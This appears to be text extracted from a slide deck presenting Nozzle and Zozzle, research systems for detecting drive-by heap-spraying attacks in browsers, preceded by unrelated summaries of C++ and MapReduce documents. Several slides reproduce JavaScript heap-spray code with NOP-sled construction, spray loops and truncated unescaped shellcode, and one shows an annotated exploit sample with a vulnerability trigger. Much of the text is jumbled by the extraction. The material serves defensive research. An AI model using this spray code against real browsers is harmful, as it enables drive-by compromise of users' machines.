This document discusses common C++ bugs and tools to find them. It describes various types of memory access bugs like buffer overflows on the stack, heap, and globals that can lead to crashes or security vulnerabilities. Threading bugs like data races, deadlocks, and race conditions on object destruction are also covered. Other undefined behaviors like initialization order issues, lack of sequence points, and integer overflows are explained. The document provides examples of each type of bug and quizzes the reader to find bugs in a code sample. It recommends resources for further reading on debugging techniques and thread sanitizers that can detect races and data races.
This document provides examples and snippets of code for MapReduce, Pig, Hive, Spark, Shark, and Disco frameworks. It also includes two sections of references for related papers and Disco documentation. The examples demonstrate basic MapReduce jobs with drivers, mappers, and reducers in Java, Pig and Hive queries, Spark and Shark table operations, and a Disco MapReduce job.
9. August -- March
2009
Nozzle
• Combination of runtime and
static analysis
• Low false positives
• Low false negatives
• 5-15% overhead
• Paper in UsenixSec ‘09
10
10. 5-15% is too high
April 2009
• Browser landscape is
very competitive
performance-wise
11
11. Offline Scanning
• Help from Bing
• Finds malware on the
January 2010
web
• Can scan a large number
of URLs
12
15. Drive-By Heap Spraying (2)
ASLR prevents the
Program Heap attack
ok
bad PC
Creates the
ok malicious object
<HTML>
<SCRIPT language="text/javascript">
Triggers the jump
shellcode = unescape("%u4343%u4343%...'');
</SCRIPT>
<IFRAME
SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB …
NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC …
഍഍">
</IFRAME>
</HTML>
16
16. Drive-By Heap Spraying (3)
Program Heap
ok bad
bad
bad
bad bad
ok bad
<SCRIPT language="text/javascript">
shellcode = unescape("%u4343%u4343%...'');
oneblock = unescape("%u0C0C%u0C0C");
Allocate 1,000s of
var fullblock = oneblock;
while (fullblock.length<0x40000) {
malicious objects
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<1000; i++) {
sprayContainer[i] = fullblock + shellcode;
}
</SCRIPT>
17
17. Nozzle: Runtime Heap Spraying Detection
Normalized attack surface (NAS)
good
bad
18
18. Local Malicious Object Detection
Is this object dangerous?
Code or Data?
000000000000 add [eax], al • Is this object code?
000000000000 add [eax], al
– Code and data look the same on x86
000000000000 add [eax], al
000000000000
NOP
add [eax], al • Focus on sled detection
000000000000 add [eax], al
000000000000 add [eax], al – Majority of object is sled
000000000000 sled
add [eax], al – Spraying scripts build simple sleds
• Is this code a NOP sled?
0101010101 and ah, [edx] – Previous techniques do not look at heap
0101010101 and ah, [edx]
0101010101 and ah, [edx] – Many heap objects look like NOP sleds
0101010101 and ah, [edx] – 80% false positive rates using previous
0101010101 shellcode
and ah, [edx]
0101010101 and ah, [edx]
techniques
0101010101 and ah, [edx] • Need stronger local techniques
19
19. Object Surface Area Calculation (1)
• Assume: attacker wants to
reach shell code from jump
to any point in object
• Goal: find blocks that are
likely to be reached via
control flow
• Strategy: use dataflow
analysis to compute
“surface area” of each block
An example object from visiting google.com
20
20. Object Surface Area Calculation (2)
4 4 12
• Each block starts with its own
size as weight
• Weights are propagated
forward with flow 2 6 12
• Invalid blocks don’t propagate 4 10
12 39
15
• Iterate until a fixpoint is
reached
2 12
12
• Compute block with highest
weight
2 14
14
An example object from visiting google.com
21
21. Nozzle Global Heap Metric
Normalize to (approx):
P(jump will cause exploit)
NSA(H) obj
build CFG
Legend: sub [eax], eax
arithmatic adc dh, bh
memory or eax, 0d172004h
SA(H) Bi
I/O or syscall in eax, 0x11
control flow test cl, ah
jecxz 021c7fd8
Compute threat add [eax], al
add [ecx], 0
add al, 30h
add al, 80h
outs dx, [esi] add al, 38h
of entire heap jecxz 021c7fde
xor [eax], eax
To target block
imul eax, [eax], 6ch
dataflow or eax, 0d179004h
SA(o) SA(Bi)
Compute threat of
Compute threat of
single block
single object 22
22. Nozzle Experimental Summary
0 False Positives
• 10 popular AJAX-heavy sites
• 150 top Web sites
0 False Negatives
• 12 published heap spraying exploits and
• 2,000 synthetic rogue pages generated using Metasploit
Runtime Overhead
• As high as 2x without sampling
• 5-10% with sampling
23
27. Drive By Detection
• Nozzle
Visit a page and let it run
• • for new processesZozzle
WatchObserve the page as it runs
• Handle infection a heapcode before it runs
• Watch for the spray
• Examine
– Detect•inWhen suspect code is found
• Kill the script before the
a VM
– Run vulnerability is triggered
antivirus
– Terminate the page
OR
– Enable other detection var she
var spray
for(i=0;
mechanisms memory[
document.
28
28. Detection Techniques
Drive By Detection Nozzle Zozzle
Certainty
Performance
Timeliness of
Detection
Hit Rate
29
34. shellcode = unescape("%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9…");
var memory = [];
var spraySize = "548864" - shellcode.length * "2";
var nop = unescape("%u0c0c%u0c0c");
while (nop.length < spraySize / "2")
{
nop += nop;
}
var nops = nop.substring("0", spraySize / "2");
Zozzle can automatically
delete nop;
for(i = "0"; i < "270"; i++)
{
identify components of an
}
memory[i] = nops + nops + shellcode;
function payload()
attack.
{
var body = document.createElement("BODY");
body.addBehavior("#default#userData");
document.appendChild(body);
try
{
for(i = "0"; i < "10"; i++)
{
body.setAttribute("s", window);
}
}
catch(e)
{
Shellcode
}
window.status += "";
}
Spray
document.getElementById("bo").onclick();
Vulnerability
35
35. Summary
Heap spraying attacks are
• Easy to implement, easy to retarget
• In widespread use
Nozzle
• Effectively detects published attacks (known and new)
• Has acceptable runtime overhead
• Can be used both online and offline
Zozzle is a static detection solution
• Fast and scalable
• Accurate and powerful
36